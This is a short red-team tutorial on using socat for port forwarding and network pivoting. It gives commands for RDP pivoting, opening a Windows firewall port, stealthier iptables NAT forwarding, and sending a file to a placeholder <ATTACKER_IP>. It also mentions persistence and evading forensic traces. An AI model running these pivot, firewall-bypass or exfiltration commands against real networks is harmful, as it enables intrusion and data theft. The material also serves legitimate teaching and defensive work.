Port Forwarding With socat: A Red Team Guide

When SSH isn’t an option, socat (Socket Cat) becomes a powerful alternative for port forwarding and pivoting in Red Team operations. Below is a deep dive into its usage, along with practical commands and scenarios.

Why Use socat?

• SSH is blocked: socat doesn’t rely on SSH.
• Lightweight: Simple syntax, no complex setup.
• Persistent connections: The `fork` option keeps the listener alive.
• Flexible: Can forward TCP/UDP ports bidirectionally.

Basic socat Command

To forward port `1234` on a host to 1.1.1.1:4321:

socat TCP4-LISTEN:1234,fork TCP4:1.1.1.1:4321

– TCP4-LISTEN:1234: Listens on port 1234.
– fork: Allows multiple connections.

Pivoting RDP with socat

If you need to access a target’s RDP (port 3389) via an intermediate machine (PC-1):

socat TCP4-LISTEN:3389,fork TCP4:3.3.3.3:3389

Now, connect to `PC-1:3389` to reach the target RDP service.

Bypassing Windows Firewall

If Windows Firewall blocks the listener:

netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389

Exposing Attacker’s Port to the Target

To allow the target to connect back to your attack machine (1.1.1.1:80):

socat TCP4-LISTEN:80,fork TCP4:1.1.1.1:80

Secure the Tunnel User (Linux)

Prevent shell access for the tunneling user:

useradd tunneluser -m -d /home/tunneluser -s /bin/true 
passwd tunneluser

You Should Know:

• File Transfer via socat:
• On the receiver:

  socat TCP4-LISTEN:4444,fork OPEN:received_file,creat
  

• On the sender:

  socat TCP4:<ATTACKER_IP>:4444 OPEN:file_to_send
  

• UDP Forwarding:

  socat UDP4-LISTEN:53,fork UDP4:8.8.8.8:53
  

• Encrypted Tunneling (SSL):

  socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork TCP4:localhost:80
  

What Undercode Say

While socat is a powerful fallback when SSH is unavailable, it leaves forensic traces (dropped binaries, open ports). Always:
– Clean up listeners: `killall socat`
– Check for artifacts:

netstat -tulnp | grep socat 
lsof -i :3389 

– Use iptables/nftables for stealthier forwarding:

iptables -t nat -A PREROUTING -p tcp --dport 1234 -j DNAT --to-destination 1.1.1.1:4321 
iptables -t nat -A POSTROUTING -j MASQUERADE 

For persistence, consider systemd services or cron jobs, but OpSec is key.

Expected Output:

A functional port forward with minimal detection risk. Use socat sparingly—prefer SSH when possible.

Related URLs:

• socat Man Page
• Red Team Port Forwarding Techniques

References:

Reported By: Iram Jack – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram